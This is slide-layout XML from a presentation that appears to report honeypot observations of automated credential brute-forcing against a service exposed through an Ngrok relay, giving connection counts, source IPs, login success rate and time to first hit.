                  <a:pt x="33291" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3320550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3338936" y="0"/>
                  <a:pt x="3353840" y="14905"/>
                  <a:pt x="3353840" y="33291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3353840" y="940405"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3353840" y="958791"/>
                  <a:pt x="3338936" y="973696"/>
                  <a:pt x="3320550" y="973696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33291" y="973696"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14905" y="973696"/>
                  <a:pt x="0" y="958791"/>
                  <a:pt x="0" y="940405"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14905"/>
                  <a:pt x="14905" y="0"/>
                  <a:pt x="3329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465742" y="1997324"/>
            <a:ext cx="990340" cy="1664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Total Connections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383708" y="2013969"/>
            <a:ext cx="149799" cy="133155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="149799" h="133155">
                <a:moveTo>
                  <a:pt x="64497" y="22886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="85302" y="22886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85302" y="35369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64497" y="35369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64497" y="22886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62416" y="8322"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="55525" y="8322"/>
                  <a:pt x="49933" y="13914"/>
                  <a:pt x="49933" y="20805"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49933" y="37450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49933" y="44342"/>
                  <a:pt x="55525" y="49933"/>
                  <a:pt x="62416" y="49933"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66577" y="49933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66577" y="58255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8322" y="58255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3719" y="58255"/>
                  <a:pt x="0" y="61974"/>
                  <a:pt x="0" y="66577"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="71181"/>
                  <a:pt x="3719" y="74900"/>
                  <a:pt x="8322" y="74900"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33289" y="74900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33289" y="83222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29128" y="83222"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="22236" y="83222"/>
                  <a:pt x="16644" y="88813"/>
                  <a:pt x="16644" y="95705"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16644" y="112349"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16644" y="119241"/>
                  <a:pt x="22236" y="124833"/>
                  <a:pt x="29128" y="124833"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="54094" y="124833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60986" y="124833"/>
                  <a:pt x="66577" y="119241"/>
                  <a:pt x="66577" y="112349"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66577" y="95705"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="66577" y="88813"/>
                  <a:pt x="60986" y="83222"/>
                  <a:pt x="54094" y="83222"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49933" y="83222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49933" y="74900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99866" y="74900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99866" y="83222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95705" y="83222"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88813" y="83222"/>
                  <a:pt x="83222" y="88813"/>
                  <a:pt x="83222" y="95705"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83222" y="112349"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="83222" y="119241"/>
                  <a:pt x="88813" y="124833"/>
                  <a:pt x="95705" y="124833"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="120672" y="124833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127563" y="124833"/>
                  <a:pt x="133155" y="119241"/>
                  <a:pt x="133155" y="112349"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="133155" y="95705"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133155" y="88813"/>
                  <a:pt x="127563" y="83222"/>
                  <a:pt x="120672" y="83222"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116511" y="83222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116511" y="74900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141477" y="74900"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="146080" y="74900"/>
                  <a:pt x="149799" y="71181"/>
                  <a:pt x="149799" y="66577"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149799" y="61974"/>
                  <a:pt x="146080" y="58255"/>
                  <a:pt x="141477" y="58255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83222" y="58255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83222" y="49933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87383" y="49933"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="94275" y="49933"/>
                  <a:pt x="99866" y="44342"/>
                  <a:pt x="99866" y="37450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99866" y="20805"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99866" y="13914"/>
                  <a:pt x="94275" y="8322"/>
                  <a:pt x="87383" y="8322"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62416" y="8322"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="116511" y="97786"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118591" y="97786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118591" y="110269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97786" y="110269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97786" y="97786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116511" y="97786"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49933" y="97786"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="52014" y="97786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52014" y="110269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31208" y="110269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31208" y="97786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49933" y="97786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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8465742" y="2230345"/>
            <a:ext cx="3204041" cy="2995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66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5,842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465742" y="2563233"/>
            <a:ext cx="3129141" cy="133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~243 per hour average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328426" y="2941892"/>
            <a:ext cx="3353840" cy="973696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3353840" h="973696">
                <a:moveTo>
                  <a:pt x="33291" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3320550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3338936" y="0"/>
                  <a:pt x="3353840" y="14905"/>
                  <a:pt x="3353840" y="33291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3353840" y="940405"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3353840" y="958791"/>
                  <a:pt x="3338936" y="973696"/>
                  <a:pt x="3320550" y="973696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33291" y="973696"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14905" y="973696"/>
                  <a:pt x="0" y="958791"/>
                  <a:pt x="0" y="940405"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14905"/>
                  <a:pt x="14905" y="0"/>
                  <a:pt x="3329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465742" y="3079208"/>
            <a:ext cx="998662" cy="1664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Unique Source IPs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1408674" y="3095853"/>
            <a:ext cx="99866" cy="133155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="99866" h="133155">
                <a:moveTo>
                  <a:pt x="0" y="49049"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21950"/>
                  <a:pt x="22366" y="0"/>
                  <a:pt x="49933" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77500" y="0"/>
                  <a:pt x="99866" y="21950"/>
                  <a:pt x="99866" y="49049"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99866" y="80075"/>
                  <a:pt x="68606" y="117265"/>
                  <a:pt x="55551" y="131438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52482" y="134767"/>
                  <a:pt x="47358" y="134767"/>
                  <a:pt x="44290" y="131438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31234" y="117265"/>
                  <a:pt x="-26" y="80075"/>
                  <a:pt x="-26" y="49049"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49933" y="66577"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59119" y="66577"/>
                  <a:pt x="66577" y="59119"/>
                  <a:pt x="66577" y="49933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66577" y="40747"/>
                  <a:pt x="59119" y="33289"/>
                  <a:pt x="49933" y="33289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40747" y="33289"/>
                  <a:pt x="33289" y="40747"/>
                  <a:pt x="33289" y="49933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33289" y="59119"/>
                  <a:pt x="40747" y="66577"/>
                  <a:pt x="49933" y="66577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8" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8465742" y="3312229"/>
            <a:ext cx="3204041" cy="2995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66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812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65742" y="3645117"/>
            <a:ext cx="3129141" cy="133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distribution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328426" y="4023776"/>
            <a:ext cx="3353840" cy="973696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3353840" h="973696">
                <a:moveTo>
                  <a:pt x="33291" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3320550" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3338936" y="0"/>
                  <a:pt x="3353840" y="14905"/>
                  <a:pt x="3353840" y="33291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3353840" y="940405"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3353840" y="958791"/>
                  <a:pt x="3338936" y="973696"/>
                  <a:pt x="3320550" y="973696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33291" y="973696"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14905" y="973696"/>
                  <a:pt x="0" y="958791"/>
                  <a:pt x="0" y="940405"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14905"/>
                  <a:pt x="14905" y="0"/>
                  <a:pt x="3329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8465742" y="4161092"/>
            <a:ext cx="998662" cy="1664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Successful Logins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1392030" y="4177737"/>
            <a:ext cx="133155" cy="133155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="133155" h="133155">
                <a:moveTo>
                  <a:pt x="66577" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="70400" y="0"/>
                  <a:pt x="73911" y="2107"/>
                  <a:pt x="75732" y="5461"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131907" y="109489"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133649" y="112714"/>
                  <a:pt x="133571" y="116615"/>
                  <a:pt x="131699" y="119761"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="129826" y="122908"/>
                  <a:pt x="126419" y="124833"/>
                  <a:pt x="122752" y="124833"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10403" y="124833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6736" y="124833"/>
                  <a:pt x="3355" y="122908"/>
                  <a:pt x="1456" y="119761"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-442" y="116615"/>
                  <a:pt x="-494" y="112714"/>
                  <a:pt x="1248" y="109489"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57423" y="5461"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59244" y="2107"/>
                  <a:pt x="62754" y="0"/>
                  <a:pt x="66577" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="66577" y="43691"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="63119" y="43691"/>
                  <a:pt x="60336" y="46474"/>
                  <a:pt x="60336" y="49933"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60336" y="79061"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60336" y="82520"/>
                  <a:pt x="63119" y="85302"/>
                  <a:pt x="66577" y="85302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70036" y="85302"/>
                  <a:pt x="72819" y="82520"/>
                  <a:pt x="72819" y="79061"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72819" y="49933"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72819" y="46474"/>
                  <a:pt x="70036" y="43691"/>
                  <a:pt x="66577" y="43691"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73521" y="99866"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="73679" y="97289"/>
                  <a:pt x="72394" y="94837"/>
                  <a:pt x="70184" y="93500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67975" y="92164"/>
                  <a:pt x="65206" y="92164"/>
                  <a:pt x="62997" y="93500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60787" y="94837"/>
                  <a:pt x="59502" y="97289"/>
                  <a:pt x="59660" y="99866"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59502" y="102444"/>
                  <a:pt x="60787" y="104896"/>
                  <a:pt x="62997" y="106232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65206" y="107569"/>
                  <a:pt x="67975" y="107569"/>
                  <a:pt x="70184" y="106232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72394" y="104896"/>
                  <a:pt x="73679" y="102444"/>
                  <a:pt x="73521" y="99866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3" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8465742" y="4394113"/>
            <a:ext cx="3204041" cy="2995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66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247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465742" y="4727001"/>
            <a:ext cx="3129141" cy="133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4.2% success rate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8153660" y="5313715"/>
            <a:ext cx="3703372" cy="740674"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3703372" h="740674">
                <a:moveTo>
                  <a:pt x="66579" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3636793" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3673563" y="0"/>
                  <a:pt x="3703372" y="29809"/>
                  <a:pt x="3703372" y="66579"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3703372" y="674095"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3703372" y="710866"/>
                  <a:pt x="3673563" y="740674"/>
                  <a:pt x="3636793" y="740674"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66579" y="740674"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29809" y="740674"/>
                  <a:pt x="0" y="710866"/>
                  <a:pt x="0" y="674095"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66579"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29809"/>
                  <a:pt x="29809" y="0"/>
                  <a:pt x="66579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1270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8328426" y="5584186"/>
            <a:ext cx="174766" cy="199732"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="174766" h="199732">
                <a:moveTo>
                  <a:pt x="132167" y="-3862"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="136809" y="-507"/>
                  <a:pt x="138525" y="5578"/>
                  <a:pt x="136419" y="10884"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="105835" y="87383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162283" y="87383"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="167549" y="87383"/>
                  <a:pt x="172230" y="90660"/>
                  <a:pt x="174025" y="95614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="175819" y="100568"/>
                  <a:pt x="174298" y="106108"/>
                  <a:pt x="170280" y="109463"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57930" y="203087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53522" y="206754"/>
                  <a:pt x="47241" y="206949"/>
                  <a:pt x="42599" y="203594"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37957" y="200240"/>
                  <a:pt x="36241" y="194154"/>
                  <a:pt x="38347" y="188849"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68931" y="112349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12483" y="112349"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7217" y="112349"/>
                  <a:pt x="2536" y="109073"/>
                  <a:pt x="741" y="104118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1053" y="99164"/>
                  <a:pt x="468" y="93625"/>
                  <a:pt x="4486" y="90270"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116836" y="-3355"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121244" y="-7022"/>
                  <a:pt x="127524" y="-7217"/>
                  <a:pt x="132167" y="-386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7" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8640508" y="5451031"/>
            <a:ext cx="1323227" cy="1664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7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Average Time to First Hit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8640508" y="5617474"/>
            <a:ext cx="1389805" cy="2995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66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 Minutes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337048" y="6195866"/>
            <a:ext cx="11517903" cy="657453"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11517903" h="657453">
                <a:moveTo>
                  <a:pt x="66580" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11451323" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11488094" y="0"/>
                  <a:pt x="11517903" y="29809"/>
                  <a:pt x="11517903" y="66580"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11517903" y="590872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11517903" y="627644"/>
                  <a:pt x="11488094" y="657453"/>
                  <a:pt x="11451323" y="657453"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66580" y="657453"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29809" y="657453"/>
                  <a:pt x="0" y="627644"/>
                  <a:pt x="0" y="590872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66580"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29809"/>
                  <a:pt x="29809" y="0"/>
                  <a:pt x="6658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Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491009" y="6366471"/>
            <a:ext cx="116511" cy="116511"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="116511" h="116511">
                <a:moveTo>
                  <a:pt x="14564" y="14564"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14564" y="10536"/>
                  <a:pt x="11310" y="7282"/>
                  <a:pt x="7282" y="7282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3254" y="7282"/>
                  <a:pt x="0" y="10536"/>
                  <a:pt x="0" y="14564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="101082"/>
                  <a:pt x="8147" y="109229"/>
                  <a:pt x="18205" y="109229"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="109229" y="109229"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113256" y="109229"/>
                  <a:pt x="116511" y="105975"/>
                  <a:pt x="116511" y="101947"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116511" y="97919"/>
                  <a:pt x="113256" y="94665"/>
                  <a:pt x="109229" y="94665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18205" y="94665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16202" y="94665"/>
                  <a:pt x="14564" y="93026"/>
                  <a:pt x="14564" y="91024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14564" y="14564"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="107090" y="34270"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109934" y="31426"/>
                  <a:pt x="109934" y="26807"/>
                  <a:pt x="107090" y="23962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104245" y="21118"/>
                  <a:pt x="99626" y="21118"/>
                  <a:pt x="96781" y="23962"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72819" y="47947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59757" y="34908"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56913" y="32063"/>
                  <a:pt x="52293" y="32063"/>
                  <a:pt x="49449" y="34908"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27603" y="56753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24758" y="59598"/>
                  <a:pt x="24758" y="64217"/>
                  <a:pt x="27603" y="67062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30447" y="69906"/>
                  <a:pt x="35067" y="69906"/>
                  <a:pt x="37911" y="67062"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="54614" y="50359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67676" y="63421"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70521" y="66265"/>
                  <a:pt x="75140" y="66265"/>
                  <a:pt x="77985" y="63421"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="107112" y="34293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31" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667791" y="6333182"/>
            <a:ext cx="11108099" cy="382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17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Observation:</a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="91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The exposure to the EU-West region resulted in an immediate influx of automated scanning traffic. Unlike local nodes, the global Ngrok relay provided a high-visibility surface for large-scale botnets, with sustained attack volume throughout the 24-hour observation period.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1219200" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1219200" h="314325">
                <a:moveTo>
                  <a:pt x="38099" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1181101" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1202142" y="0"/>
                  <a:pt x="1219200" y="17058"/>
                  <a:pt x="1219200" y="38099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1219200" y="276226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1219200" y="297267"/>
                  <a:pt x="1202142" y="314325"/>
                  <a:pt x="1181101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4825" y="476250"/>
            <a:ext cx="1040011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Vector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191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Methodology: Credential Brute-Forcing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09713"/>
            <a:ext cx="5591175" cy="5324475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5591175" h="5324475">
                <a:moveTo>
                  <a:pt x="76193" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5514982" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5557062" y="0"/>
                  <a:pt x="5591175" y="34113"/>
                  <a:pt x="5591175" y="76193"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5591175" y="5248282"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5591175" y="5290362"/>
                  <a:pt x="5557062" y="5324475"/>
                  <a:pt x="5514982" y="5324475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76193" y="5324475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34113" y="5324475"/>
                  <a:pt x="0" y="5290362"/>
                  <a:pt x="0" y="5248282"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="76193"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34141"/>
                  <a:pt x="34141" y="0"/>
                  <a:pt x="761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19125" y="1743075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Pattern Analysis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9125" y="2162175"/>
            <a:ext cx="5200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vast majority of attacks utilized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highlight>
                  <a:srgbClr val="EF4444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Dictionary Attacks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 Botnets cycled through common default credentials and leaked password lists with high-frequency automated attempts.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23888" y="3062288"/>
            <a:ext cx="5114925" cy="1571625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5114925" h="1571625">
                <a:moveTo>
                  <a:pt x="38096" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5076829" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5097869" y="0"/>
                  <a:pt x="5114925" y="17056"/>
                  <a:pt x="5114925" y="38096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5114925" y="1533529"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5114925" y="1554569"/>
                  <a:pt x="5097869" y="1571625"/>
                  <a:pt x="5076829" y="1571625"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38096" y="1571625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17056" y="1571625"/>
                  <a:pt x="0" y="1554569"/>
